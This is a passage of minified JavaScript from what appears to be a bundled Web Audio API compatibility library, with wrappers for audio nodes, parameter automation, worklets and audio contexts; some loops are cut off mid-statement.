r=mo(e)?[e.playbackRate]:vn(e)?Array.from(e.parameters.values()):go(e)?[e.Q,e.detune,e.frequency,e.gain]:wo(e)?[e.offset]:vo(e)?[e.gain]:_o(e)?[e.detune,e.frequency]:yo(e)?[e.pan]:[];for(const o of r){const s=Te(o);s!==void 0&&s.activeInputs.forEach(([a])=>pt(a,t))}se(e)&&He(e)},Eo=e=>{pt(e.destination,[])},Ao=e=>e===void 0||typeof e=="number"||typeof e=="string"&&(e==="balanced"||e==="interactive"||e==="playback"),bo=(e,t,n,r,o,s,a,c)=>class extends e{constructor(u,d){const l=s(u),h=a(l),m=o(l,d,h),w=h?t(c):null;super(u,!1,m,w),this._isNodeOfNativeOfflineAudioContext=h,this._nativeAudioDestinationNode=m}get channelCount(){return this._nativeAudioDestinationNode.channelCount}set channelCount(u){if(this._isNodeOfNativeOfflineAudioContext)throw r();if(u>this._nativeAudioDestinationNode.maxChannelCount)throw n();this._nativeAudioDestinationNode.channelCount=u}get channelCountMode(){return this._nativeAudioDestinationNode.channelCountMode}set channelCountMode(u){if(this._isNodeOfNativeOfflineAudioContext)throw r();this._nativeAudioDestinationNode.channelCountMode=u}get maxChannelCount(){return this._nativeAudioDestinationNode.maxChannelCount}},Co=e=>{const t=new WeakMap,n=async(r,o)=>{const s=o.destination;return t.set(o,s),await e(r,o,s),s};return{render(r,o){const s=t.get(o);return s!==void 0?Promise.resolve(s):n(r,o)}}},To=(e,t,n,r,o,s,a,c)=>(i,u)=>{const d=u.listener,l=()=>{const _=new Float32Array(1),E=t(u,{channelCount:1,channelCountMode:"explicit",channelInterpretation:"speakers",numberOfInputs:9}),y=a(u);let C=!1,M=[0,0,-1,0,1,0],I=[0,0,0];const N=()=>{if(C)return;C=!0;const U=r(u,256,9,0);U.onaudioprocess=({inputBuffer:R})=>{const x=[s(R,_,0),s(R,_,1),s(R,_,2),s(R,_,3),s(R,_,4),s(R,_,5)];x.some((O,L)=>O!==M[L])&&(d.setOrientation(...x),M=x);const D=[s(R,_,6),s(R,_,7),s(R,_,8)];D.some((O,L)=>O!==I[L])&&(d.setPosition(...D),I=D)},E.connect(U)},P=U=>R=>{R!==M[U]&&(M[U]=R,d.setOrientation(...M))},k=U=>R=>{R!==I[U]&&(I[U]=R,d.setPosition(...I))},B=(U,R,x)=>{const D=n(u,{channelCount:1,channelCountMode:"explicit",channelInterpretation:"discrete",offset:R});D.connect(E,0,U),D.start(),Object.defineProperty(D.offset,"defaultValue",{get(){return R}});const O=e({context:i},y,D.offset,Ye,Ce);return c(O,"value",L=>()=>L.call(O),L=>W=>{try{L.call(O,W)}catch(G){if(G.code!==9)throw G}N(),y&&x(W)}),O.cancelAndHoldAtTime=(L=>y?()=>{throw o()}:(...W)=>{const G=L.apply(O,W);return N(),G})(O.cancelAndHoldAtTime),O.cancelScheduledValues=(L=>y?()=>{throw o()}:(...W)=>{const G=L.apply(O,W);return N(),G})(O.cancelScheduledValues),O.exponentialRampToValueAtTime=(L=>y?()=>{throw o()}:(...W)=>{const G=L.apply(O,W);return N(),G})(O.exponentialRampToValueAtTime),O.linearRampToValueAtTime=(L=>y?()=>{throw o()}:(...W)=>{const G=L.apply(O,W);return N(),G})(O.linearRampToValueAtTime),O.setTargetAtTime=(L=>y?()=>{throw o()}:(...W)=>{const G=L.apply(O,W);return N(),G})(O.setTargetAtTime),O.setValueAtTime=(L=>y?()=>{throw o()}:(...W)=>{const G=L.apply(O,W);return N(),G})(O.setValueAtTime),O.setValueCurveAtTime=(L=>y?()=>{throw o()}:(...W)=>{const G=L.apply(O,W);return N(),G})(O.setValueCurveAtTime),O};return{forwardX:B(0,0,P(0)),forwardY:B(1,0,P(1)),forwardZ:B(2,-1,P(2)),positionX:B(6,0,k(0)),positionY:B(7,0,k(1)),positionZ:B(8,0,k(2)),upX:B(3,0,P(3)),upY:B(4,1,P(4)),upZ:B(5,0,P(5))}},{forwardX:h,forwardY:m,forwardZ:w,positionX:f,positionY:p,positionZ:g,upX:v,upY:A,upZ:T}=d.forwardX===void 0?l():d;return{get forwardX(){return h},get forwardY(){return m},get forwardZ(){return w},get positionX(){return f},get positionY(){return p},get positionZ(){return g},get upX(){return v},get upY(){return A},get upZ(){return T}}},We=e=>"context"in e,Ne=e=>We(e[0]),le=(e,t,n,r)=>{for(const o of e)if(n(o)){if(r)return!1;throw Error("The set contains at least one similar element.")}return e.add(t),!0},Xt=(e,t,[n,r],o)=>{le(e,[t,n,r],s=>s[0]===t&&s[1]===n,o)},Zt=(e,[t,n,r],o)=>{const s=e.get(t);s===void 0?e.set(t,new Set([[n,r]])):le(s,[n,r],a=>a[0]===n,o)},En=e=>"inputs"in e,mt=(e,t,n,r)=>{if(En(t)){const o=t.inputs[r];return e.connect(o,n,0),[o,n,0]}return e.connect(t,n,r),[t,n,r]},An=(e,t,n)=>{for(const r of e)if(r[0]===t&&r[1]===n)return e.delete(r),r;return null},No=(e,t,n)=>qe(e,r=>r[0]===t&&r[1]===n),bn=(e,t)=>{if(!be(e).delete(t))throw new Error("Missing the expected event listener.")},Cn=(e,t,n)=>{const r=K(e,t),o=qe(r,s=>s[0]===n);return r.size===0&&e.delete(t),o},gt=(e,t,n,r)=>{En(t)?e.disconnect(t.inputs[r],n,0):e.disconnect(t,n,r)},X=e=>K(dn,e),Ee=e=>K(hn,e),ue=e=>ut.has(e),xe=e=>!we.has(e),Kt=(e,t)=>new Promise(n=>{if(t!==null)n(!0);else{const r=e.createScriptProcessor(256,1,1),o=e.createGain(),s=e.createBuffer(1,2,44100),a=s.getChannelData(0);a[0]=1,a[1]=1;const c=e.createBufferSource();c.buffer=s,c.loop=!0,c.connect(r).connect(e.destination),c.connect(o),c.disconnect(o),r.onaudioprocess=i=>{const u=i.inputBuffer.getChannelData(0);Array.prototype.some.call(u,d=>d===1)?n(!0):n(!1),c.stop(),r.onaudioprocess=null,c.disconnect(r),r.disconnect(e.destination)},c.start()}}),ot=(e,t)=>{const n=new Map;for(const r of e)for(const o of r){const s=n.get(o);n.set(o,s===void 0?1:s+1)}n.forEach((r,o)=>t(o,r))},Ve=e=>"context"in e,Mo=e=>{const t=new Map;e.connect=(n=>(r,o=0,s=0)=>{const a=Ve(r)?n(r,o,s):n(r,o),c=t.get(r);return c===void 0?t.set(r,[{input:s,output:o}]):c.every(i=>i.input!==s||i.output!==o)&&c.push({input:s,output:o}),a})(e.connect.bind(e)),e.disconnect=(n=>(r,o,s)=>{if(n.apply(e),r===void 0)t.clear();else if(typeof r=="number")for(const[a,c]of t){const i=c.filter(u=>u.output!==r);i.length===0?t.delete(a):t.set(a,i)}else if(t.has(r))if(o===void 0)t.delete(r);else{const a=t.get(r);if(a!==void 0){const c=a.filter(i=>i.output!==o&&(i.input!==s||s===void 0));c.length===0?t.delete(r):t.set(r,c)}}for(const[a,c]of t)c.forEach(i=>{Ve(a)?e.connect(a,i.output,i.input):e.connect(a,i.output)})})(e.disconnect)},Oo=(e,t,n,r)=>{const{activeInputs:o,passiveInputs:s}=Te(t),{outputs:a}=q(e),c=be(e),i=u=>{const d=X(e),l=Ee(t);if(u){const h=Cn(s,e,n);Xt(o,e,h,!1),!r&&!ue(e)&&d.connect(l,n)}else{const h=No(o,e,n);Zt(s,h,!1),!r&&!ue(e)&&d.disconnect(l,n)}};return le(a,[t,n],u=>u[0]===t&&u[1]===n,!0)?(c.add(i),se(e)?Xt(o,e,[n,i],!0):Zt(s,[e,n,i],!0),!0):!1},So=(e,t,n,r)=>{const{activeInputs:o,passiveInputs:s}=q(t),a=An(o[r],e,n);return a===null?[wn(s,e,n,r)[2],!1]:[a[2],!0]},Ro=(e,t,n)=>{const{activeInputs:r,passiveInputs:o}=Te(t),s=An(r,e,n);return s===null?[Cn(o,e,n)[1],!1]:[s[2],!0]},At=(e,t,n,r,o)=>{const[s,a]=So(e,n,r,o);if(s!==null&&(bn(e,s),a&&!t&&!ue(e)&>(X(e),X(n),r,o)),se(n)){const{activeInputs:c}=q(n);ft(n,c)}},bt=(e,t,n,r)=>{const[o,s]=Ro(e,n,r);o!==null&&(bn(e,o),s&&!t&&!ue(e)&&X(e).disconnect(Ee(n),r))},Io=(e,t)=>{const n=q(e),r=[];for(const o of n.outputs)Ne(o)?At(e,t,...o):bt(e,t,...o),r.push(o[0]);return n.outputs.clear(),r},ko=(e,t,n)=>{const r=q(e),o=[];for(const s of r.outputs)s[1]===n&&(Ne(s)?At(e,t,...s):bt(e,t,...s),o.push(s[0]),r.outputs.delete(s));return o},Lo=(e,t,n,r,o)=>{const s=q(e);return Array.from(s.outputs).filter(a=>a[0]===n&&(r===void 0||a[1]===r)&&(o===void 0||a[2]===o)).map(a=>(Ne(a)?At(e,t,...a):bt(e,t,...a),s.outputs.delete(a),a[0]))},Po=(e,t,n,r,o,s,a,c,i,u,d,l,h,m,w,f)=>class extends u{constructor(g,v,A,T){super(A),this._context=g,this._nativeAudioNode=A;const _=d(g);l(_)&&n(Kt,()=>Kt(_,f))!==!0&&Mo(A),dn.set(this,A),mn.set(this,new Set),g.state!=="closed"&&v&&ye(this),e(this,T,A)}get channelCount(){return this._nativeAudioNode.channelCount}set channelCount(g){this._nativeAudioNode.channelCount=g}get channelCountMode(){return this._nativeAudioNode.channelCountMode}set channelCountMode(g){this._nativeAudioNode.channelCountMode=g}get channelInterpretation(){return this._nativeAudioNode.channelInterpretation}set channelInterpretation(g){this._nativeAudioNode.channelInterpretation=g}get context(){return this._context}get numberOfInputs(){return this._nativeAudioNode.numberOfInputs}get numberOfOutputs(){return this._nativeAudioNode.numberOfOutputs}connect(g,v=0,A=0){if(v<0||v>=this._nativeAudioNode.numberOfOutputs)throw o();const T=d(this._context),_=w(T);if(h(g)||m(g))throw s();if(We(g)){const C=X(g);try{const I=mt(this._nativeAudioNode,C,v,A),N=xe(this);(_||N)&&this._nativeAudioNode.disconnect(...I),this.context.state!=="closed"&&!N&&xe(g)&&ye(g)}catch(I){throw I.code===12?s():I}if(t(this,g,v,A,_)){const I=i([this],g);ot(I,r(_))}return g}const E=Ee(g);if(E.name==="playbackRate"&&E.maxValue===1024)throw a();try{this._nativeAudioNode.connect(E,v),(_||xe(this))&&this._nativeAudioNode.disconnect(E,v)}catch(C){throw C.code===12?s():C}if(Oo(this,g,v,_)){const C=i([this],g);ot(C,r(_))}}disconnect(g,v,A){let T;const _=d(this._context),E=w(_);if(g===void 0)T=Io(this,E);else if(typeof g=="number"){if(g<0||g>=this.numberOfOutputs)throw o();T=ko(this,E,g)}else{if(v!==void 0&&(v<0||v>=this.numberOfOutputs)||We(g)&&A!==void 0&&(A<0||A>=g.numberOfInputs))throw o();if(T=Lo(this,E,g,v,A),T.length===0)throw s()}for(const y of T){const C=i([this],y);ot(C,c)}}},xo=(e,t,n,r,o,s,a,c,i,u,d,l,h)=>(m,w,f,p=null,g=null)=>{const v=new Hr(f.defaultValue),A=w?r(v):null,T={get defaultValue(){return f.defaultValue},get maxValue(){return p===null?f.maxValue:p},get minValue(){return g===null?f.minValue:g},get value(){return f.value},set value(_){f.value=_,T.setValueAtTime(_,m.context.currentTime)},cancelAndHoldAtTime(_){if(typeof f.cancelAndHoldAtTime=="function")A===null&&v.flush(m.context.currentTime),v.add(o(_)),f.cancelAndHoldAtTime(_);else{const E=Array.from(v).pop();A===null&&v.flush(m.context.currentTime),v.add(o(_));const y=Array.from(v).pop();f.cancelScheduledValues(_),E!==y&&y!==void 0&&(y.type==="exponentialRampToValue"?f.exponentialRampToValueAtTime(y.value,y.endTime):y.type==="linearRampToValue"?f.linearRampToValueAtTime(y.value,y.endTime):y.type==="setValue"?f.setValueAtTime(y.value,y.startTime):y.type==="setValueCurve"&&f.setValueCurveAtTime(y.values,y.startTime,y.duration))}return T},cancelScheduledValues(_){return A===null&&v.flush(m.context.currentTime),v.add(s(_)),f.cancelScheduledValues(_),T},exponentialRampToValueAtTime(_,E){if(_===0)throw new RangeError;if(!Number.isFinite(E)||E<0)throw new RangeError;return A===null&&v.flush(m.context.currentTime),v.add(a(_,E)),f.exponentialRampToValueAtTime(_,E),T},linearRampToValueAtTime(_,E){return A===null&&v.flush(m.context.currentTime),v.add(c(_,E)),f.linearRampToValueAtTime(_,E),T},setTargetAtTime(_,E,y){return A===null&&v.flush(m.context.currentTime),v.add(i(_,E,y)),f.setTargetAtTime(_,E,y),T},setValueAtTime(_,E){return A===null&&v.flush(m.context.currentTime),v.add(u(_,E)),f.setValueAtTime(_,E),T},setValueCurveAtTime(_,E,y){const C=_ instanceof Float32Array?_:new Float32Array(_);if(l!==null&&l.name==="webkitAudioContext"){const M=E+y,I=m.context.sampleRate,N=Math.ceil(E*I),P=Math.floor(M*I),k=P-N,B=new Float32Array(k);for(let R=0;R({replay(t){for(const n of e)if(n.type==="exponentialRampToValue"){const{endTime:r,value:o}=n;t.exponentialRampToValueAtTime(o,r)}else if(n.type==="linearRampToValue"){const{endTime:r,value:o}=n;t.linearRampToValueAtTime(o,r)}else if(n.type==="setTarget"){const{startTime:r,target:o,timeConstant:s}=n;t.setTargetAtTime(o,r,s)}else if(n.type==="setValue"){const{startTime:r,value:o}=n;t.setValueAtTime(o,r)}else if(n.type==="setValueCurve"){const{duration:r,startTime:o,values:s}=n;t.setValueCurveAtTime(s,o,r)}else throw new Error("Can't apply an unknown automation.")}});class Tn{constructor(t){this._map=new Map(t)}get size(){return this._map.size}entries(){return this._map.entries()}forEach(t,n=null){return this._map.forEach((r,o)=>t.call(n,r,o,this))}get(t){return this._map.get(t)}has(t){return this._map.has(t)}keys(){return this._map.keys()}values(){return this._map.values()}}const Bo={channelCount:2,channelCountMode:"explicit",channelInterpretation:"speakers",numberOfInputs:1,numberOfOutputs:1,parameterData:{},processorOptions:{}},Do=(e,t,n,r,o,s,a,c,i,u,d,l,h,m)=>class extends t{constructor(f,p,g){var v;const A=c(f),T=i(A),_=d({...Bo,...g});h(_);const E=lt.get(A),y=E?.get(p),C=T||A.state!=="closed"?A:(v=a(A))!==null&&v!==void 0?v:A,M=o(C,T?null:f.baseLatency,u,p,y,_),I=T?r(p,_,y):null;super(f,!0,M,I);const N=[];M.parameters.forEach((k,B)=>{const U=n(this,T,k);N.push([B,U])}),this._nativeAudioWorkletNode=M,this._onprocessorerror=null,this._parameters=new Tn(N),T&&e(A,this);const{activeInputs:P}=s(this);l(M,P)}get onprocessorerror(){return this._onprocessorerror}set onprocessorerror(f){const p=typeof f=="function"?m(this,f):null;this._nativeAudioWorkletNode.onprocessorerror=p;const g=this._nativeAudioWorkletNode.onprocessorerror;this._onprocessorerror=g!==null&&g===p?f:g}get parameters(){return this._parameters===null?this._nativeAudioWorkletNode.parameters:this._parameters}get port(){return this._nativeAudioWorkletNode.port}};function Fe(e,t,n,r,o){if(typeof e.copyFromChannel=="function")t[n].byteLength===0&&(t[n]=new Float32Array(128)),e.copyFromChannel(t[n],r,o);else{const s=e.getChannelData(r);if(t[n].byteLength===0)t[n]=s.slice(o,o+128);else{const a=new Float32Array(s.buffer,o*Float32Array.BYTES_PER_ELEMENT,128);t[n].set(a)}}}const Nn=(e,t,n,r,o)=>{typeof e.copyToChannel=="function"?t[n].byteLength!==0&&e.copyToChannel(t[n],r,o):t[n].byteLength!==0&&e.getChannelData(r).set(t[n],o)},je=(e,t)=>{const n=[];for(let r=0;r{const n=K(dt,e),r=X(t);return K(n,r)},Vo=async(e,t,n,r,o,s,a)=>{const c=t===null?Math.ceil(e.context.length/128)*128:t.length,i=r.channelCount*r.numberOfInputs,u=o.reduce((p,g)=>p+g,0),d=u===0?null:n.createBuffer(u,c,n.sampleRate);if(s===void 0)throw new Error("Missing the processor constructor.");const l=q(e),h=await Wo(n,e),m=je(r.numberOfInputs,r.channelCount),w=je(r.numberOfOutputs,o),f=Array.from(e.parameters.keys()).reduce((p,g)=>({...p,[g]:new Float32Array(128)}),{});for(let p=0;p0&&t!==null)for(let g=0;g{Fe(t,f,g,i+v,p)});for(let g=0;gl.activeInputs[T].size===0?[]:A),v=a(p/n.sampleRate,n.sampleRate,()=>h.process(g,w,f));if(d!==null)for(let A=0,T=0;A(p,g,v)=>{const A=new WeakMap;let T=null;const _=async(E,y)=>{let C=d(E),M=null;const I=Et(C,y),N=Array.isArray(g.outputChannelCount)?g.outputChannelCount:Array.from(g.outputChannelCount);if(l===null){const P=N.reduce((R,x)=>R+x,0),k=o(y,{channelCount:Math.max(1,P),channelCountMode:"explicit",channelInterpretation:"discrete",numberOfOutputs:Math.max(1,P)}),B=[];for(let R=0;R{const W=new h(O,Math.ceil(E.context.length/128)*128,y.sampleRate),G=[],he=[];for(let j=0;j{const H=s(W,{channelCount:1,channelCountMode:"explicit",channelInterpretation:"discrete",offset:j.value});return await m(W,j,H.offset),H})),me=r(W,{channelCount:1,channelCountMode:"explicit",channelInterpretation:"speakers",numberOfInputs:Math.max(1,x+D)});for(let j=0;jw(E,W,j))),f(W)})(),y,g,N,v,u)}const P=await T,k=n(y,{buffer:null,channelCount:2,channelCountMode:"max",channelInterpretation:"speakers",loop:!1,loopEnd:0,loopStart:0,playbackRate:1}),[B,U,R]=M;P!==null&&(k.buffer=P,k.start(0)),k.connect(B);for(let x=0,D=0;x(n,r)=>{const o=t.get(n);if(o!==void 0)return o;const s=e.get(n);if(s!==void 0)return s;try{const a=r();return a instanceof Promise?(e.set(n,a),a.catch(()=>!1).then(c=>(e.delete(n),t.set(n,c),c))):(t.set(n,a),a)}catch{return t.set(n,!1),!1}},$o=e=>(t,n,r)=>e(n,t,r),Go=e=>(t,n,r=0,o=0)=>{const s=t[r];if(s===void 0)throw e();return Ve(n)?s.connect(n,0,o):s.connect(n,0)},zo={channelCount:2,channelCountMode:"max",channelInterpretation:"speakers",offset:1},qo=(e,t,n,r,o,s,a)=>class extends e{constructor(i,u){const d=o(i),l={...zo,...u},h=r(d,l),m=s(d),w=m?n():null;super(i,!1,h,w),this._constantSourceNodeRenderer=w,this._nativeConstantSourceNode=h,this._offset=t(this,m,h.offset,Ye,Ce),this._onended=null}get offset(){return this._offset}get onended(){return this._onended}set onended(i){const u=typeof i=="function"?a(this,i):null;this._nativeConstantSourceNode.onended=u;const d=this._nativeConstantSourceNode.onended;this._onended=d!==null&&d===u?i:d}start(i=0){if(this._nativeConstantSourceNode.start(i),this._constantSourceNodeRenderer!==null&&(this._constantSourceNodeRenderer.start=i),this.context.state!=="closed"){ye(this);const u=()=>{this._nativeConstantSourceNode.removeEventListener("ended",u),se(this)&&He(this)};this._nativeConstantSourceNode.addEventListener("ended",u)}}stop(i=0){this._nativeConstantSourceNode.stop(i),this._constantSourceNodeRenderer!==null&&(this._constantSourceNodeRenderer.stop=i)}},Ho=(e,t,n,r,o)=>()=>{const s=new WeakMap;let a=null,c=null;const i=async(u,d)=>{let l=n(u);const h=Et(l,d);if(!h){const m={channelCount:l.channelCount,channelCountMode:l.channelCountMode,channelInterpretation:l.channelInterpretation,offset:l.offset.value};l=t(d,m),a!==null&&l.start(a),c!==null&&l.stop(c)}return s.set(d,l),h?await e(d,u.offset,l.offset):await r(d,u.offset,l.offset),await o(u,d,l),l};return{set start(u){a=u},set stop(u){c=u},render(u,d){const l=s.get(d);return l!==void 0?Promise.resolve(l):i(u,d)}}},Yo=e=>t=>(e[0]=t,e[0]),Xo=()=>new DOMException("","DataCloneError"),Jt=e=>{const{port1:t,port2:n}=new MessageChannel;return new Promise(r=>{const o=()=>{n.onmessage=null,t.close(),n.close(),r()};n.onmessage=()=>o();try{t.postMessage(e,[e])}finally{o()}})},Zo=(e,t,n,r,o,s,a,c,i,u,d)=>(l,h)=>{const m=a(l)?l:s(l);if(o.has(h)){const w=n();return Promise.reject(w)}try{o.add(h)}catch{}return t(i,()=>i(m))?m.decodeAudioData(h).then(w=>(Jt(h).catch(()=>{}),t(c,()=>c(w))||d(w),e.add(w),w)):new Promise((w,f)=>{const p=async()=>{try{await Jt(h)}catch{}},g=v=>{f(v),p()};try{m.decodeAudioData(h,v=>{typeof v.copyFromChannel!="function"&&(u(v),_n(v)),e.add(v),p().then(()=>w(v))},v=>{g(v===null?r():v)})}catch(v){g(v)}})},Ko=(e,t,n,r,o,s,a,c)=>(i,u)=>{const d=t.get(i);if(d===void 0)throw new Error("Missing the expected cycle count.");const l=s(i.context),h=c(l);if(d===u){if(t.delete(i),!h&&a(i)){const m=r(i),{outputs:w}=n(i);for(const f of w)if(Ne(f)){const p=r(f[0]);e(m,p,f[1],f[2])}else{const p=o(f[0]);m.connect(p,f[1])}}}else t.set(i,d-u)},Jo=e=>(t,n,r,o)=>e(t[o],s=>s[0]===n&&s[1]===r),Qo=e=>(t,n)=>{e(t).delete(n)},es=e=>"delayTime"in e,ts=(e,t,n)=>function r(o,s){const a=We(s)?s:n(e,s);if(es(a))return[];if(o[0]===a)return[o];if(o.includes(a))return[];const{outputs:c}=t(a);return Array.from(c).map(i=>r([...o,a],i[0])).reduce((i,u)=>i.concat(u),[])},Pe=(e,t,n)=>{const r=t[n];if(r===void 0)throw e();return r},ns=e=>(t,n=void 0,r=void 0,o=0)=>n===void 0?t.forEach(s=>s.disconnect()):typeof n=="number"?Pe(e,t,n).disconnect():Ve(n)?r===void 0?t.forEach(s=>s.disconnect(n)):o===void 0?Pe(e,t,r).disconnect(n,0):Pe(e,t,r).disconnect(n,0,o):r===void 0?t.forEach(s=>s.disconnect(n)):Pe(e,t,r).disconnect(n,0),rs=()=>new DOMException("","EncodingError"),os=e=>t=>new Promise((n,r)=>{if(e===null){r(new SyntaxError);return}const o=e.document.head;if(o===null)r(new SyntaxError);else{const s=e.document.createElement("script"),a=new Blob([t],{type:"application/javascript"}),c=URL.createObjectURL(a),i=e.onerror,u=()=>{e.onerror=i,URL.revokeObjectURL(c)};e.onerror=(d,l,h,m,w)=>{if(l===c||l===e.location.href&&h===1&&m===1)return u(),r(w),!1;if(i!==null)return i(d,l,h,m,w)},s.onerror=()=>{u(),r(new SyntaxError)},s.onload=()=>{u(),n()},s.src=c,s.type="module",o.appendChild(s)}}),ss=e=>class{constructor(n){this._nativeEventTarget=n,this._listeners=new WeakMap}addEventListener(n,r,o){if(r!==null){let s=this._listeners.get(r);s===void 0&&(s=e(this,r),typeof r=="function"&&this._listeners.set(r,s)),this._nativeEventTarget.addEventListener(n,s,o)}}dispatchEvent(n){return this._nativeEventTarget.dispatchEvent(n)}removeEventListener(n,r,o){const s=r===null?void 0:this._listeners.get(r);this._nativeEventTarget.removeEventListener(n,s===void 0?null:s,o)}},as=e=>(t,n,r)=>{Object.defineProperties(e,{currentFrame:{configurable:!0,get(){return Math.round(t*n)}},currentTime:{configurable:!0,get(){return t}}});try{return r()}finally{e!==null&&(delete e.currentFrame,delete e.currentTime)}},is=e=>async t=>{try{const n=await fetch(t);if(n.ok)return[await n.text(),n.url]}catch{}throw e()},cs=(e,t)=>n=>t(e,n),us=e=>t=>{const n=e(t);if(n.renderer===null)throw new Error("Missing the renderer of the given AudioNode in the audio graph.");return n.renderer},ls=e=>t=>{var n;return(n=e.get(t))!==null&&n!==void 0?n:0},ds=e=>t=>{const n=e(t);if(n.renderer===null)throw new Error("Missing the renderer of the given AudioParam in the audio graph.");return n.renderer},fs=e=>t=>e.get(t),Z=()=>new DOMException("","InvalidStateError"),hs=e=>t=>{const n=e.get(t);if(n===void 0)throw Z();return n},ps=(e,t)=>n=>{let r=e.get(n);if(r!==void 0)return r;if(t===null)throw new Error("Missing the native OfflineAudioContext constructor.");return r=new t(1,1,44100),e.set(n,r),r},ms=e=>t=>{const n=e.get(t);if(n===void 0)throw new Error("The context has no set of AudioWorkletNodes.");return n},gs=()=>new DOMException("","InvalidAccessError"),ws=(e,t,n,r,o,s)=>a=>(c,i)=>{const u=e.get(c);if(u===void 0){if(!a&&s(c)){const d=r(c),{outputs:l}=n(c);for(const h of l)if(Ne(h)){const m=r(h[0]);t(d,m,h[1],h[2])}else{const m=o(h[0]);d.disconnect(m,h[1])}}e.set(c,i)}else e.set(c,u+i)},vs=e=>t=>e!==null&&t instanceof e,_s=e=>t=>e!==null&&typeof e.AudioNode=="function"&&t instanceof e.AudioNode,ys=e=>t=>e!==null&&typeof e.AudioParam=="function"&&t instanceof e.AudioParam,Es=(e,t)=>n=>e(n)||t(n),As=e=>t=>e!==null&&t instanceof e,bs=e=>e!==null&&e.isSecureContext,Cs=(e,t,n,r)=>class extends e{constructor(s,a){const c=n(s),i=t(c,a);if(r(c))throw new TypeError;super(s,!0,i,null),this._nativeMediaStreamAudioSourceNode=i}get mediaStream(){return this._nativeMediaStreamAudioSourceNode.mediaStream}},Ts=(e,t,n,r,o)=>class extends r{constructor(a={}){if(o===null)throw new Error("Missing the native AudioContext constructor.");let c;try{c=new o(a)}catch(d){throw d.code===12&&d.message==="sampleRate is not in range"?t():d}if(c===null)throw n();if(!Ao(a.latencyHint))throw new TypeError(`The provided value '${a.latencyHint}' is not a valid enum value of type AudioContextLatencyCategory.`);if(a.sampleRate!==void 0&&c.sampleRate!==a.sampleRate)throw t();super(c,2);const{latencyHint:i}=a,{sampleRate:u}=c;if(this._baseLatency=typeof c.baseLatency=="number"?c.baseLatency:i==="balanced"?512/u:i==="interactive"||i===void 0?256/u:i==="playback"?1024/u:Math.max(2,Math.min(128,Math.round(i*u/128)))*128/u,this._nativeAudioContext=c,o.name==="webkitAudioContext"?(this._nativeGainNode=c.createGain(),this._nativeOscillatorNode=c.createOscillator(),this._nativeGainNode.gain.value=1e-37,this._nativeOscillatorNode.connect(this._nativeGainNode).connect(c.destination),this._nativeOscillatorNode.start()):(this._nativeGainNode=null,this._nativeOscillatorNode=null),this._state=null,c.state==="running"){this._state="suspended";const d=()=>{this._state==="suspended"&&(this._state=null),c.removeEventListener("statechange",d)};c.addEventListener("statechange",d)}}get baseLatency(){return this._baseLatency}get state(){return this._state!==null?this._state:this._nativeAudioContext.state}close(){return this.state==="closed"?this._nativeAudioContext.close().then(()=>{throw e()}):(this._state==="suspended"&&(this._state=null),this._nativeAudioContext.close().then(()=>{this._nativeGainNode!==null&&this._nativeOscillatorNode!==null&&(this._nativeOscillatorNode.stop(),this._nativeGainNode.disconnect(),this._nativeOscillatorNode.disconnect()),Eo(this)}))}resume(){return this._state==="suspended"?new Promise((a,c)=>{const i=()=>{this._nativeAudioContext.removeEventListener("statechange",i),this._nativeAudioContext.state==="running"?a():this.resume().then(a,c)};this._nativeAudioContext.addEventListener("statechange",i)}):this._nativeAudioContext.resume().catch(a=>{throw a===void 0||a.code===15?e():a})}suspend(){return this._nativeAudioContext.suspend().catch(a=>{throw a===void 0?e():a})}},Ns=(e,t,n,r,o,s)=>class extends n{constructor(c,i){super(c),this._nativeContext=c,pn.set(this,c),r(c)&&o.set(c,new Set),this._destination=new e(this,i),this._listener=t(this,c),this._onstatechange=null}get currentTime(){return this._nativeContext.currentTime}get destination(){return this._destination}get listener(){return this._listener}get onstatechange(){return this._onstatechange}set onstatechange(c){const i=typeof c=="function"?s(this,c):null;this._nativeContext.onstatechange=i;const u=this._nativeContext.onstatechange;this._onstatechange=u!==null&&u===i?c:u}get sampleRate(){return this._nativeContext.sampleRate}get state(){return this._nativeContext.state}},wt=e=>{const t=new Uint32Array([1179011410,40,1163280727,544501094,16,131073,44100,176400,1048580,1635017060,4,0]);try{const n=e.decodeAudioData(t.buffer,()=>{});return n===void 0?!1:(n.catch(()=>{}),!0)}catch{}return!1},Ms=(e,t)=>(n,r,o)=>{const s=new Set;return n.connect=(a=>(c,i=0,u=0)=>{const d=s.size===0;if(t(c))return a.call(n,c,i,u),e(s,[c,i,u],l=>l[0]===c&&l[1]===i&&l[2]===u,!0),d&&r(),c;a.call(n,c,i),e(s,[c,i],l=>l[0]===c&&l[1]===i,!0),d&&r()})(n.connect),n.disconnect=(a=>(c,i,u)=>{const d=s.size>0;if(c===void 0)a.apply(n),s.clear();else if(typeof c=="number"){a.call(n,c);for(const h of s)h[1]===c&&s.delete(h)}else{t(c)?a.call(n,c,i,u):a.call(n,c,i);for(const h of s)h[0]===c&&(i===void 0||h[1]===i)&&(u===void 0||h[2]===u)&&s.delete(h)}const l=s.size===0;d&&l&&o()})(n.disconnect),n},ce=(e,t,n)=>{const r=t[n];r!==void 0&&r!==e[n]&&(e[n]=r)},Me=(e,t)=>{ce(e,t,"channelCount"),ce(e,t,"channelCountMode"),ce(e,t,"channelInterpretation")},Os=e=>e===null?null:e.hasOwnProperty("AudioBuffer")?e.AudioBuffer:null,Ct=(e,t,n)=>{const r=t[n];r!==void 0&&r!==e[n].value&&(e[n].value=r)},Ss=e=>{e.start=(t=>{let n=!1;return(r=0,o=0,s)=>{if(n)throw Z();t.call(e,r,o,s),n=!0}})(e.start)},Mn=e=>{e.start=(t=>(n=0,r=0,o)=>{if(typeof o=="number"&&o<0||r<0||n<0)throw new RangeError("The parameters can't be negative.");t.call(e,n,r,o)})(e.start)},On=e=>{e.stop=(t=>(n=0)=>{if(n<0)throw new RangeError("The parameter can't be negative.");t.call(e,n)})(e.stop)},Rs=(e,t,n,r,o,s,a,c,i,u,d)=>(l,h)=>{const m=l.createBufferSource();return Me(m,h),Ct(m,h,"playbackRate"),ce(m,h,"buffer"),ce(m,h,"loop"),ce(m,h,"loopEnd"),ce(m,h,"loopStart"),t(n,()=>n(l))||Ss(m),t(r,()=>r(l))||i(m),t(o,()=>o(l))||u(m,l),t(s,()=>s(l))||Mn(m),t(a,()=>a(l))||d(m,l),t(c,()=>c(l))||On(m),e(l,m),m},Is=e=>e===null?null:e.hasOwnProperty("AudioContext")?e.AudioContext:e.hasOwnProperty("webkitAudioContext")?e.webkitAudioContext:null,ks=(e,t)=>(n,r,o)=>{const 